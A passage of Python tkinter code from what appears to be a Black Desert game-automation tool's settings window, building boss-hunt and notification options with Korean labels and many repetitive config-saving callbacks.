for i in range(len(LYBBlackDesert.tobeol_boss_list)):
frame_row = ttk.Frame(frame_row_top)
frame = ttk.Frame(frame_row)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + str(i)] = tkinter.BooleanVar(frame)
if not lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + str(i) in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + str(i)] = True
check_box = ttk.Checkbutton(
master = frame,
text = "%2d. %s" % (i+1, self.preformat_cjk(LYBBlackDesert.tobeol_boss_list[i], 18)),
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + str(i)],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
combobox_list = LYBBlackDesert.tobeol_rank_list
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + str(i)] = tkinter.StringVar(frame)
if i == 0:
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '0'].trace(
'w', lambda *args: self.callback_tobeol_process_0_booleanvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '0')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '0'].trace(
'w', lambda *args: self.callback_tobeol_rank_0_stringvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '0')
)
elif i == 1:
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '1'].trace(
'w', lambda *args: self.callback_tobeol_process_1_booleanvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '1')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '1'].trace(
'w', lambda *args: self.callback_tobeol_rank_1_stringvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '1')
)
elif i == 2:
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '2'].trace(
'w', lambda *args: self.callback_tobeol_process_2_booleanvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '2')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '2'].trace(
'w', lambda *args: self.callback_tobeol_rank_2_stringvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '2')
)
elif i == 3:
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '3'].trace(
'w', lambda *args: self.callback_tobeol_process_3_booleanvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '3')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '3'].trace(
'w', lambda *args: self.callback_tobeol_rank_3_stringvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '3')
)
elif i == 4:
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '4'].trace(
'w', lambda *args: self.callback_tobeol_process_4_booleanvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '4')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '4'].trace(
'w', lambda *args: self.callback_tobeol_rank_4_stringvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '4')
)
elif i == 5:
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '5'].trace(
'w', lambda *args: self.callback_tobeol_process_5_booleanvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '5')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '5'].trace(
'w', lambda *args: self.callback_tobeol_rank_5_stringvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '5')
)
elif i == 6:
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '6'].trace(
'w', lambda *args: self.callback_tobeol_process_6_booleanvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '6')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '6'].trace(
'w', lambda *args: self.callback_tobeol_rank_6_stringvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '6')
)
elif i == 7:
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '7'].trace(
'w', lambda *args: self.callback_tobeol_process_7_booleanvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '7')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '7'].trace(
'w', lambda *args: self.callback_tobeol_rank_7_stringvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '7')
)
elif i == 8:
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '8'].trace(
'w', lambda *args: self.callback_tobeol_process_8_booleanvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '8')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '8'].trace(
'w', lambda *args: self.callback_tobeol_rank_8_stringvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '8')
)
elif i == 9:
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '9'].trace(
'w', lambda *args: self.callback_tobeol_process_9_booleanvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '9')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '9'].trace(
'w', lambda *args: self.callback_tobeol_rank_9_stringvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '9')
)
frame_row_top.pack(anchor=tkinter.NW, side=tkinter.LEFT, padx=10)
frame_row_top = ttk.Frame(frame_head)
elif i == 10:
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '10'].trace(
'w', lambda *args: self.callback_tobeol_process_10_booleanvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '10')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '10'].trace(
'w', lambda *args: self.callback_tobeol_rank_10_stringvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '10')
)
elif i == 11:
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '11'].trace(
'w', lambda *args: self.callback_tobeol_process_11_booleanvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '11')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '11'].trace(
'w', lambda *args: self.callback_tobeol_rank_11_stringvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '11')
)
elif i == 12:
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '12'].trace(
'w', lambda *args: self.callback_tobeol_process_12_booleanvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '12')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '12'].trace(
'w', lambda *args: self.callback_tobeol_rank_12_stringvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '12')
)
elif i == 13:
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '13'].trace(
'w', lambda *args: self.callback_tobeol_process_13_booleanvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '13')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '13'].trace(
'w', lambda *args: self.callback_tobeol_rank_13_stringvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '13')
)
elif i == 14:
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '14'].trace(
'w', lambda *args: self.callback_tobeol_process_14_booleanvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '14')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '14'].trace(
'w', lambda *args: self.callback_tobeol_rank_14_stringvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '14')
)
elif i == 15:
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '15'].trace(
'w', lambda *args: self.callback_tobeol_process_15_booleanvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '15')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '15'].trace(
'w', lambda *args: self.callback_tobeol_rank_15_stringvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '15')
)
elif i == 16:
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '16'].trace(
'w', lambda *args: self.callback_tobeol_process_16_booleanvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + '16')
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '16'].trace(
'w', lambda *args: self.callback_tobeol_rank_16_stringvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + '16')
)
if not lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + str(i) in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + str(i)] = combobox_list[0]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + str(i)],
state = "readonly",
height = 11,
width = 4,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + str(i)])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = ' 단계 하락'
)
label.pack(side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame_row.pack(anchor=tkinter.W)
frame_row_top.pack(anchor=tkinter.NW, side=tkinter.LEFT, padx=10)
frame_head.pack(anchor=tkinter.W, padx=5, pady=5)
# +-----------------------------------------+
# | |
# | 알림 설정 |
# | |
# +-----------------------------------------+
frame_head = ttk.Frame(self.inner_frame_dic['notify_tab_frame'])
frame_row = ttk.Frame(frame_head)
frame = ttk.Frame(frame_row)
self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'urewanryo'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'urewanryo'].trace(
'w', lambda *args: self.callback_notify_urewanryo_stringvar(args, lybconstant.LYB_DO_STRING_BD_NOTIFY + 'urewanryo')
)
if not lybconstant.LYB_DO_STRING_BD_NOTIFY + 'urewanryo' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_NOTIFY + 'urewanryo'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '의뢰 완료',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'urewanryo'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame = ttk.Frame(frame_row)
self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'world_boss'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'world_boss'].trace(
'w', lambda *args: self.callback_notify_world_boss_stringvar(args, lybconstant.LYB_DO_STRING_BD_NOTIFY + 'world_boss')
)
if not lybconstant.LYB_DO_STRING_BD_NOTIFY + 'world_boss' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_NOTIFY + 'world_boss'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '월드 보스 클리어',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'world_boss'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame = ttk.Frame(frame_row)
self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'migung'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'migung'].trace(
'w', lambda *args: self.callback_notify_migung_stringvar(args, lybconstant.LYB_DO_STRING_BD_NOTIFY + 'migung')
)
if not lybconstant.LYB_DO_STRING_BD_NOTIFY + 'migung' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_NOTIFY + 'migung'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '미궁 클리어',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'migung'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame = ttk.Frame(frame_row)
self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'tobeol'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'tobeol'].trace(
'w', lambda *args: self.callback_notify_tobeol_stringvar(args, lybconstant.LYB_DO_STRING_BD_NOTIFY + 'tobeol')
)
if not lybconstant.LYB_DO_STRING_BD_NOTIFY + 'tobeol' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_NOTIFY + 'tobeol'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '토벌 클리어',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'tobeol'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame = ttk.Frame(frame_row)
self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'character_death'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'character_death'].trace(
'w', lambda *args: self.callback_notify_character_death_stringvar(args, lybconstant.LYB_DO_STRING_BD_NOTIFY + 'character_death')
)
if not lybconstant.LYB_DO_STRING_BD_NOTIFY + 'character_death' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_NOTIFY + 'character_death'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '캐릭터 필드 사망',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'character_death'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame_row.pack(anchor=tkinter.W)
frame_head.pack(anchor=tkinter.W, padx=5, pady=5)
# ------
self.option_dic['option_note'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
self.inner_frame_dic['options'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
self.set_game_option()
def get_option_text(self, text):
return "%s" % self.preformat_cjk(text, lybconstant.LYB_BD_OPTION_WIDTH) + ':'
def get_item_rank_text(self, text):
return "%s" % self.preformat_cjk(text, 6)
def callback_tobeol_process_0_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_1_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_2_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_3_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_4_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_5_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_6_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_7_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_8_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_9_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_10_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_11_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_12_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_13_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_14_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_15_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_16_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_0_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_1_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_2_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_3_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_4_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_5_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_6_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_7_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_8_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_9_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_10_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_11_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_12_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_13_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_14_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_15_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_16_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_auto_update_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_custom_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_mal_bag_open_item_limit_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_pet_number_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_pet_set_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_loot_chegwang_boolean_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_loot_chejip_boolean_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_loot_beolmok_boolean_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_muge_percentage_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_search_complete_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_jeoljeon_mode_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_insahagi_page_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_period_reqeat_quest_random_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_period_world_boss_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_naksi_limit_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_gecheok_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_join_limit_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_friend_number_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_guild_number_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_friend_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_guild_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_open_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_repeat_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_join_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_place_7_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_place_6_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_place_5_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_place_4_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_place_3_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_place_2_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_place_1_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_place_0_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_7_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_6_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_5_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_4_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_3_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_2_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_1_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_0_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_tukbat_count_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_tukbat_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_money_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_blackstone_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chuksa_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_daejeon_count_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_daejeon_giveup_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_daejeon_match_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_degrade_number_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_notify_character_death_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_notify_tobeol_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_notify_migung_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_notify_world_boss_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_notify_urewanryo_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_hunt_pet_period_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_complete_sequence_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_complete_period_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_invite_rank_op_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_invite_rank2_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_invite_rank_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_invite_boolean_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_geomungiun2_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_geomungiun_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_jamjeryeok_dolpa_rank_order_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_gwangwonseok_hapseong_auto_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sujeong_hapseong_auto_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_jamjeryeok_dolpa_rank_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_gwangwonseok_hapseong_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sujeong_hapseong_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_character_move_time_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_character_move_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_jamjeryoek_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_boolean_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_item_rank_6_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_item_rank_5_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_item_rank_4_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_item_rank_3_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_item_rank_2_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_item_rank_1_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_item_rank_0_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_pummok_4_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_pummok_3_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_pummok_2_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_pummok_1_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_sell_pummok_0_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_hunt_quest_click_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_period_wait_jadong_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_fix_target_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_quest_repeat_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_chracter_change_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_period_potion_shop_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_jadong_boolean_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_pet_number_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_potion_boolean_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_ddolmani_skill_0_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_ddolmani_skill_1_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_ddolmani_skill_2_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_period_gabang_full_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_period_jeoljeon_mode_warning_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_location_y_stringvar(self, args, option_name):
